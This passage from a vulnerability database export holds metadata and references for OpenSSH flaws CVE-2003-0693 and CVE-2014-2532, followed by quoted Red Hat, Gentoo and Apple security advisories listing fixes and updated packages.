"id": "20030916 [SLACKWARE-SECURITY] OPENSSH SECURITY ADVISORY (SSA:2003-259-01)",
"trust": 0.6
},
{
"db": "MANDRAKE",
"id": "MDKSA-2003:090",
"trust": 0.6
},
{
"db": "CERT/CC",
"id": "CA-2003-24",
"trust": 0.6
},
{
"db": "SUNALERT",
"id": "1000620",
"trust": 0.6
},
{
"db": "DEBIAN",
"id": "DSA-383",
"trust": 0.6
},
{
"db": "DEBIAN",
"id": "DSA-382",
"trust": 0.6
},
{
"db": "TRUSTIX",
"id": "2003-0033",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2003:280",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2003:279",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200309-032",
"trust": 0.6
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "BID",
"id": "8628"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000274"
},
{
"db": "CNNVD",
"id": "CNNVD-200309-032"
},
{
"db": "NVD",
"id": "CVE-2003-0693"
}
]
},
"id": "VAR-200309-0035",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.38200912
},
"last_update_date": "2024-07-23T20:26:04.438000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "2003120401",
"trust": 0.8,
"url": "http://support.f-secure.com/enu/corporate/supportissue/ssh/comments/comments-issue-2003120401.shtml"
},
{
"title": "HPSBUX0311-302",
"trust": 0.8,
"url": "http://www1.itrc.hp.com/service/cki/docdisplay.do?docid=hpsbux0311-302"
},
{
"title": "HPSBUX0309-282",
"trust": 0.8,
"url": "http://www2.itrc.hp.com/service/cki/docdisplay.do?docid=hpsbux0309-282"
},
{
"title": "HPSBUX0311-302",
"trust": 0.8,
"url": "http://h50221.www5.hp.com/upassist/itrc_japan/assist2/secbltn/hp-ux/hpsbux0311-302.html"
},
{
"title": "HPSBUX0309-282",
"trust": 0.8,
"url": "http://h50221.www5.hp.com/upassist/itrc_japan/assist2/secbltn/hp-ux/hpsbux0309-282.html"
},
{
"title": "openssh",
"trust": 0.8,
"url": "http://www.miraclelinux.com/support/update/data/openssh.html"
},
{
"title": "buffer.adv",
"trust": 0.8,
"url": "http://www.openssh.com/txt/buffer.adv"
},
{
"title": "RHSA-2003:279",
"trust": 0.8,
"url": "https://rhn.redhat.com/errata/rhsa-2003-279.html"
},
{
"title": "471",
"trust": 0.8,
"url": "http://www.ssh.com/company/newsroom/article/471/"
},
{
"title": "56862",
"trust": 0.8,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-56862-1"
},
{
"title": "56861",
"trust": 0.8,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-56861-1"
},
{
"title": "56862",
"trust": 0.8,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-56862-3"
},
{
"title": "56861",
"trust": 0.8,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-56861-3"
},
{
"title": "550 OpenSSH Security Update",
"trust": 0.8,
"url": "http://sunsolve.sun.com/pub-cgi/show.pl?target=cobalt/raq550.eng\u0026amp;nav=patchpage"
},
{
"title": "TLSA-2003-53",
"trust": 0.8,
"url": "http://www.turbolinux.com/security/2003/tlsa-2003-53.txt"
},
{
"title": "TLSA-2003-51",
"trust": 0.8,
"url": "http://www.turbolinux.com/security/2003/tlsa-2003-51.txt"
},
{
"title": "RHSA-2003:279",
"trust": 0.8,
"url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2003-279j.html"
},
{
"title": "TLSA-2003-53",
"trust": 0.8,
"url": "http://www.turbolinux.co.jp/security/2003/tlsa-2003-53j.txt"
},
{
"title": "TLSA-2003-51",
"trust": 0.8,
"url": "http://www.turbolinux.co.jp/security/2003/tlsa-2003-51j.txt"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2003-000274"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2003-0693"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://www.openssh.com/txt/buffer.adv"
},
{
"trust": 2.7,
"url": "http://www.cert.org/advisories/ca-2003-24.html"
},
{
"trust": 2.4,
"url": "http://www.kb.cert.org/vuls/id/333628"
},
{
"trust": 1.6,
"url": "http://www.redhat.com/support/errata/rhsa-2003-280.html"
},
{
"trust": 1.6,
"url": "http://www.debian.org/security/2003/dsa-383"
},
{
"trust": 1.6,
"url": "http://www.debian.org/security/2003/dsa-382"
},
{
"trust": 1.6,
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000620.1-1"
},
{
"trust": 1.6,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2003-september/010146.html"
},
{
"trust": 1.6,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2003-september/010135.html"
},
{
"trust": 1.6,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2003-september/010103.html"
},
{
"trust": 1.6,
"url": "http://www.mandriva.com/security/advisories?name=mdksa-2003:090"
},
{
"trust": 1.4,
"url": "http://xforce.iss.net/xforce/xfdb/13191"
},
{
"trust": 1.2,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=106373247528528\u0026w=2"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=106373247528528\u0026w=2"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=106373546332230\u0026w=2"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=106374466212309\u0026w=2"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=106381396120332\u0026w=2"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=106381409220492\u0026w=2"
},
{
"trust": 1.0,
"url": "http://www.openwall.com/lists/oss-security/2024/07/01/3"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/13191"
},
{
"trust": 1.0,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a2719"
},
{
"trust": 1.0,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a447"
},
{
"trust": 0.8,
"url": "http://www.mindrot.org/pipermail/openssh-unix-announce/2003-september/000062.html"
},
{
"trust": 0.8,
"url": "http://www.freebsd.org/cgi/cvsweb.cgi/ports/security/openssh/files/patch-buffer.c"
},
{
"trust": 0.8,
"url": "http://www.secunia.com/advisories/10156/"
},
{
"trust": 0.8,
"url": "http://www.ciac.org/ciac/bulletins/n-151.shtml"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2003-0693"
},
{
"trust": 0.8,
"url": "http://www.jpcert.or.jp/wr/2003/wr033801.txt"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnca-2003-24"
},
{
"trust": 0.8,
"url": "http://jvn.jp/tr/trca-2003-24"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2003-0693"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/8628"
},
{
"trust": 0.8,
"url": "http://www.isskk.co.jp/support/techinfo/general/openssh144.html"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=106381409220492\u0026w=2"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=106381396120332\u0026w=2"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=106374466212309\u0026w=2"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=106373546332230\u0026w=2"
},
{
"trust": 0.6,
"url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:447"
},
{
"trust": 0.6,
"url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:2719"
},
{
"trust": 0.3,
"url": "http://www.slackware.org/security/viewer.php?l=slackware-security\u0026y=2003\u0026m=slackware-security.368193"
},
{
"trust": 0.3,
"url": "http://www.bluecoat.com/downloads/support/bcs_openssh_vulnerability.pdf"
},
{
"trust": 0.3,
"url": "http://www.openwall.com/owl/changes-current.shtml"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/warp/public/707/cisco-sa-20030917-openssh.shtml"
},
{
"trust": 0.3,
"url": "http://distro.conectiva.com.br/atualizacoes/index.php?id=a\u0026anuncio=000739"
},
{
"trust": 0.3,
"url": "http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/buffer.c.diff?r1=1.1.1.6\u0026r2=1.1.1.7\u0026f=h"
},
{
"trust": 0.3,
"url": "http://www.f-secure.com/support/technical/ssh/ssh1_openssh_buffer_management.shtml"
},
{
"trust": 0.3,
"url": "http://support.novell.com/cgi-bin/search/searchtid.cgi?/2968534.htm"
},
{
"trust": 0.3,
"url": "http://www.netapp.com/support/"
},
{
"trust": 0.3,
"url": "http://www.stonesoft.com/document/art/3031.html"
},
{
"trust": 0.3,
"url": "http://www.foundrynet.com/solutions/advisories/openssh333628.html"
},
{
"trust": 0.3,
"url": "http://www.netscreen.com/services/security/alerts/openssh_1.jsp"
},
{
"trust": 0.3,
"url": "http://support.novell.com/cgi-bin/search/searchtid.cgi?/2967067.htm"
},
{
"trust": 0.3,
"url": "http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2f56861"
},
{
"trust": 0.3,
"url": "http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2f56862"
},
{
"trust": 0.3,
"url": "http://sunsolve.sun.com/pub-cgi/show.pl?target=cobalt/raq550.eng\u0026nav=patchpage"
},
{
"trust": 0.3,
"url": "http://sunsolve.sun.com/patches/linux/security.html"
},
{
"trust": 0.3,
"url": "http://www.yellowdoglinux.com/resources/errata/ydu-20030917-1.txt"
},
{
"trust": 0.3,
"url": "/archive/1/337921"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "BID",
"id": "8628"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000274"
},
{
"db": "CNNVD",
"id": "CNNVD-200309-032"
},
{
"db": "NVD",
"id": "CVE-2003-0693"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "BID",
"id": "8628"
},
{
"db": "JVNDB",
"id": "JVNDB-2003-000274"
},
{
"db": "CNNVD",
"id": "CNNVD-200309-032"
},
{
"db": "NVD",
"id": "CVE-2003-0693"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-09-16T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2003-09-16T00:00:00",
"db": "BID",
"id": "8628"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2003-000274"
},
{
"date": "2003-09-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200309-032"
},
{
"date": "2003-09-22T04:00:00",
"db": "NVD",
"id": "CVE-2003-0693"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-12T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2009-11-05T23:47:00",
"db": "BID",
"id": "8628"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2003-000274"
},
{
"date": "2006-03-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200309-032"
},
{
"date": "2024-07-01T11:15:03.240000",
"db": "NVD",
"id": "CVE-2003-0693"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200309-032"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH contains buffer management errors",
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "8628"
},
{
"db": "CNNVD",
"id": "CNNVD-200309-032"
}
],
"trust": 0.9
}
}
VAR-201403-0275
Vulnerability from variot - Updated: 2024-07-23 20:15sshd in OpenSSH before 6.6 does not properly support wildcards on AcceptEnv lines in sshd_config, which allows remote attackers to bypass intended environment restrictions by using a substring located before a wildcard character. OpenSSH is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Versions prior to OpenSSH 6.6 are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssh security, bug fix, and enhancement update Advisory ID: RHSA-2014:1552-02 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1552.html Issue date: 2014-10-14 CVE Names: CVE-2014-2532 CVE-2014-2653 =====================================================================
- Summary:
Updated openssh packages that fix two security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server.
It was discovered that OpenSSH clients did not correctly verify DNS SSHFP records. A malicious server could use this flaw to force a connecting client to skip the DNS SSHFP record check and require the user to perform manual host verification of the DNS SSHFP record. (CVE-2014-2653)
It was found that OpenSSH did not properly handle certain AcceptEnv parameter values with wildcard characters. (CVE-2014-2532)
This update also fixes the following bugs:
-
Based on the SP800-131A information security standard, the generation of a digital signature using the Digital Signature Algorithm (DSA) with the key size of 1024 bits and RSA with the key size of less than 2048 bits is disallowed after the year 2013. After this update, ssh-keygen no longer generates keys with less than 2048 bits in FIPS mode. However, the sshd service accepts keys of size 1024 bits as well as larger keys for compatibility reasons. (BZ#993580)
-
Previously, the openssh utility incorrectly set the oom_adj value to -17 for all of its children processes. This behavior was incorrect because the children processes were supposed to have this value set to 0. This update applies a patch to fix this bug and oom_adj is now properly set to 0 for all children processes as expected. (BZ#1010429)
-
Previously, if the sshd service failed to verify the checksum of an installed FIPS module using the fipscheck library, the information about this failure was only provided at the standard error output of sshd. As a consequence, the user could not notice this message and be uninformed when a system had not been properly configured for FIPS mode. To fix this bug, this behavior has been changed and sshd now sends such messages via the syslog service. (BZ#1020803)
-
When keys provided by the pkcs11 library were removed from the ssh agent using the "ssh-add -e" command, the user was prompted to enter a PIN. With this update, a patch has been applied to allow the user to remove the keys provided by pkcs11 without the PIN. (BZ#1042519)
In addition, this update adds the following enhancements:
-
With this update, ControlPersist has been added to OpenSSH. The option in conjunction with the ControlMaster configuration directive specifies that the master connection remains open in the background after the initial client connection has been closed. (BZ#953088)
-
When the sshd daemon is configured to force the internal SFTP session, and the user attempts to use a connection other than SFTP, the appropriate message is logged to the /var/log/secure file. (BZ#997377)
-
Support for Elliptic Curve Cryptography modes for key exchange (ECDH) and host user keys (ECDSA) as specified by RFC5656 has been added to the openssh packages. However, they are not enabled by default and the user has to enable them manually. For more information on how to configure ECDSA and ECDH with OpenSSH, see: https://access.redhat.com/solutions/711953 (BZ#1028335)
All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
953088 - OpenSSH adding ControlPersist patch to enable full usage of SSH control options 1010429 - Openssh Incorrectly sets oom_adj in all Children after Performing a Reload 1023043 - ssh_config manual page lists incorrect default value of KexAlgorithms 1023044 - Fix man page for ssh-keygen because of certificate support 1027197 - X11 Forwarding does not work with default config - error: Failed to allocate internet-domain X11 display socket 1028643 - Connection remains when fork() fails. 1077843 - CVE-2014-2532 openssh: AcceptEnv environment restriction bypass flaw 1081338 - CVE-2014-2653 openssh: failure to check DNS SSHFP records in certain scenarios 1108836 - ssh-keyscan should ignore SIGPIPE 1111568 - AUTOCREATE_SERVER_KEYS=RSAONLY is not supported by init script
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssh-5.3p1-104.el6.src.rpm
i386: openssh-5.3p1-104.el6.i686.rpm openssh-askpass-5.3p1-104.el6.i686.rpm openssh-clients-5.3p1-104.el6.i686.rpm openssh-debuginfo-5.3p1-104.el6.i686.rpm openssh-server-5.3p1-104.el6.i686.rpm
x86_64: openssh-5.3p1-104.el6.x86_64.rpm openssh-askpass-5.3p1-104.el6.x86_64.rpm openssh-clients-5.3p1-104.el6.x86_64.rpm openssh-debuginfo-5.3p1-104.el6.x86_64.rpm openssh-server-5.3p1-104.el6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssh-debuginfo-5.3p1-104.el6.i686.rpm openssh-ldap-5.3p1-104.el6.i686.rpm pam_ssh_agent_auth-0.9.3-104.el6.i686.rpm
x86_64: openssh-debuginfo-5.3p1-104.el6.i686.rpm openssh-debuginfo-5.3p1-104.el6.x86_64.rpm openssh-ldap-5.3p1-104.el6.x86_64.rpm pam_ssh_agent_auth-0.9.3-104.el6.i686.rpm pam_ssh_agent_auth-0.9.3-104.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssh-5.3p1-104.el6.src.rpm
x86_64: openssh-5.3p1-104.el6.x86_64.rpm openssh-clients-5.3p1-104.el6.x86_64.rpm openssh-debuginfo-5.3p1-104.el6.x86_64.rpm openssh-server-5.3p1-104.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssh-askpass-5.3p1-104.el6.x86_64.rpm openssh-debuginfo-5.3p1-104.el6.i686.rpm openssh-debuginfo-5.3p1-104.el6.x86_64.rpm openssh-ldap-5.3p1-104.el6.x86_64.rpm pam_ssh_agent_auth-0.9.3-104.el6.i686.rpm pam_ssh_agent_auth-0.9.3-104.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssh-5.3p1-104.el6.src.rpm
i386: openssh-5.3p1-104.el6.i686.rpm openssh-askpass-5.3p1-104.el6.i686.rpm openssh-clients-5.3p1-104.el6.i686.rpm openssh-debuginfo-5.3p1-104.el6.i686.rpm openssh-server-5.3p1-104.el6.i686.rpm
ppc64: openssh-5.3p1-104.el6.ppc64.rpm openssh-askpass-5.3p1-104.el6.ppc64.rpm openssh-clients-5.3p1-104.el6.ppc64.rpm openssh-debuginfo-5.3p1-104.el6.ppc64.rpm openssh-server-5.3p1-104.el6.ppc64.rpm
s390x: openssh-5.3p1-104.el6.s390x.rpm openssh-askpass-5.3p1-104.el6.s390x.rpm openssh-clients-5.3p1-104.el6.s390x.rpm openssh-debuginfo-5.3p1-104.el6.s390x.rpm openssh-server-5.3p1-104.el6.s390x.rpm
x86_64: openssh-5.3p1-104.el6.x86_64.rpm openssh-askpass-5.3p1-104.el6.x86_64.rpm openssh-clients-5.3p1-104.el6.x86_64.rpm openssh-debuginfo-5.3p1-104.el6.x86_64.rpm openssh-server-5.3p1-104.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssh-debuginfo-5.3p1-104.el6.i686.rpm openssh-ldap-5.3p1-104.el6.i686.rpm pam_ssh_agent_auth-0.9.3-104.el6.i686.rpm
ppc64: openssh-debuginfo-5.3p1-104.el6.ppc.rpm openssh-debuginfo-5.3p1-104.el6.ppc64.rpm openssh-ldap-5.3p1-104.el6.ppc64.rpm pam_ssh_agent_auth-0.9.3-104.el6.ppc.rpm pam_ssh_agent_auth-0.9.3-104.el6.ppc64.rpm
s390x: openssh-debuginfo-5.3p1-104.el6.s390.rpm openssh-debuginfo-5.3p1-104.el6.s390x.rpm openssh-ldap-5.3p1-104.el6.s390x.rpm pam_ssh_agent_auth-0.9.3-104.el6.s390.rpm pam_ssh_agent_auth-0.9.3-104.el6.s390x.rpm
x86_64: openssh-debuginfo-5.3p1-104.el6.i686.rpm openssh-debuginfo-5.3p1-104.el6.x86_64.rpm openssh-ldap-5.3p1-104.el6.x86_64.rpm pam_ssh_agent_auth-0.9.3-104.el6.i686.rpm pam_ssh_agent_auth-0.9.3-104.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssh-5.3p1-104.el6.src.rpm
i386: openssh-5.3p1-104.el6.i686.rpm openssh-askpass-5.3p1-104.el6.i686.rpm openssh-clients-5.3p1-104.el6.i686.rpm openssh-debuginfo-5.3p1-104.el6.i686.rpm openssh-server-5.3p1-104.el6.i686.rpm
x86_64: openssh-5.3p1-104.el6.x86_64.rpm openssh-askpass-5.3p1-104.el6.x86_64.rpm openssh-clients-5.3p1-104.el6.x86_64.rpm openssh-debuginfo-5.3p1-104.el6.x86_64.rpm openssh-server-5.3p1-104.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssh-debuginfo-5.3p1-104.el6.i686.rpm openssh-ldap-5.3p1-104.el6.i686.rpm pam_ssh_agent_auth-0.9.3-104.el6.i686.rpm
x86_64: openssh-debuginfo-5.3p1-104.el6.i686.rpm openssh-debuginfo-5.3p1-104.el6.x86_64.rpm openssh-ldap-5.3p1-104.el6.x86_64.rpm pam_ssh_agent_auth-0.9.3-104.el6.i686.rpm pam_ssh_agent_auth-0.9.3-104.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-2532.html https://www.redhat.com/security/data/cve/CVE-2014-2653.html https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/solutions/711953
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFUPK1zXlSAg2UNWIIRAgLFAKCbc0zGun3IBr/70ChlueemUsEORgCfa8RL IT6RfneDJRTv3j8EqBZSrp0= =33Fn -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201405-06
http://security.gentoo.org/
Severity: High Title: OpenSSH: Multiple vulnerabilities Date: May 11, 2014 Bugs: #231292, #247466, #386307, #410869, #419357, #456006, #505066 ID: 201405-06
Synopsis
Multiple vulnerabilities have been found in OpenSSH, the worst of which may allow remote attackers to execute arbitrary code. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All OpenSSH users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openssh-6.6_p1-r1"
NOTE: One or more of the issues described in this advisory have been fixed in previous updates. They are included in this advisory for the sake of completeness. It is likely that your system is already no longer affected by them.
References
[ 1 ] CVE-2008-5161 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5161 [ 2 ] CVE-2010-4478 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4478 [ 3 ] CVE-2010-4755 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4755 [ 4 ] CVE-2010-5107 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5107 [ 5 ] CVE-2011-5000 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-5000 [ 6 ] CVE-2012-0814 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0814 [ 7 ] CVE-2014-2532 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2532
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201405-06.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2015-09-30-3 OS X El Capitan 10.11
OS X El Capitan 10.11 is now available and addresses the following:
Address Book Available for: Mac OS X v10.6.8 and later Impact: A local attacker may be able to inject arbitrary code to processes loading the Address Book framework Description: An issue existed in Address Book framework's handling of an environment variable. This issue was addressed through improved environment variable handling. CVE-ID CVE-2015-5897 : Dan Bastone of Gotham Digital Science
AirScan Available for: Mac OS X v10.6.8 and later Impact: An attacker with a privileged network position may be able to extract payload from eSCL packets sent over a secure connection Description: An issue existed in the processing of eSCL packets. This issue was addressed through improved validation checks. CVE-ID CVE-2015-5853 : an anonymous researcher
apache_mod_php Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in PHP Description: Multiple vulnerabilities existed in PHP versions prior to 5.5.27, including one which may have led to remote code execution. This issue was addressed by updating PHP to version 5.5.27. CVE-ID CVE-2014-9425 CVE-2014-9427 CVE-2014-9652 CVE-2014-9705 CVE-2014-9709 CVE-2015-0231 CVE-2015-0232 CVE-2015-0235 CVE-2015-0273 CVE-2015-1351 CVE-2015-1352 CVE-2015-2301 CVE-2015-2305 CVE-2015-2331 CVE-2015-2348 CVE-2015-2783 CVE-2015-2787 CVE-2015-3329 CVE-2015-3330
Apple Online Store Kit Available for: Mac OS X v10.6.8 and later Impact: A malicious application may gain access to a user's keychain items Description: An issue existed in validation of access control lists for iCloud keychain items. This issue was addressed through improved access control list checks. CVE-ID CVE-2015-5836 : XiaoFeng Wang of Indiana University, Luyi Xing of Indiana University, Tongxin Li of Peking University, Tongxin Li of Peking University, Xiaolong Bai of Tsinghua University
AppleEvents Available for: Mac OS X v10.6.8 and later Impact: A user connected through screen sharing can send Apple Events to a local user's session Description: An issue existed with Apple Event filtering that allowed some users to send events to other users. This was addressed by improved Apple Event handling. CVE-ID CVE-2015-5849 : Jack Lawrence (@_jackhl)
Audio Available for: Mac OS X v10.6.8 and later Impact: Playing a malicious audio file may lead to an unexpected application termination Description: A memory corruption issue existed in the handling of audio files. This issue issue was addressed through improved memory handling. CVE-ID CVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.: Prof. Taekyoung Kwon), Yonsei University, Seoul, Korea
bash Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in bash Description: Multiple vulnerabilities existed in bash versions prior to 3.2 patch level 57. These issues were addressed by updating bash version 3.2 to patch level 57. CVE-ID CVE-2014-6277 CVE-2014-7186 CVE-2014-7187
Certificate Trust Policy Available for: Mac OS X v10.6.8 and later Impact: Update to the certificate trust policy Description: The certificate trust policy was updated. The complete list of certificates may be viewed at https://support.apple.com/en- us/HT202858.
CFNetwork Cookies Available for: Mac OS X v10.6.8 and later Impact: An attacker in a privileged network position can track a user's activity Description: A cross-domain cookie issue existed in the handling of top level domains. The issue was address through improved restrictions of cookie creation. CVE-ID CVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua University
CFNetwork FTPProtocol Available for: Mac OS X v10.6.8 and later Impact: Malicious FTP servers may be able to cause the client to perform reconnaissance on other hosts Description: An issue existed in the handling of FTP packets when using the PASV command. This issue was resolved through improved validation. CVE-ID CVE-2015-5912 : Amit Klein
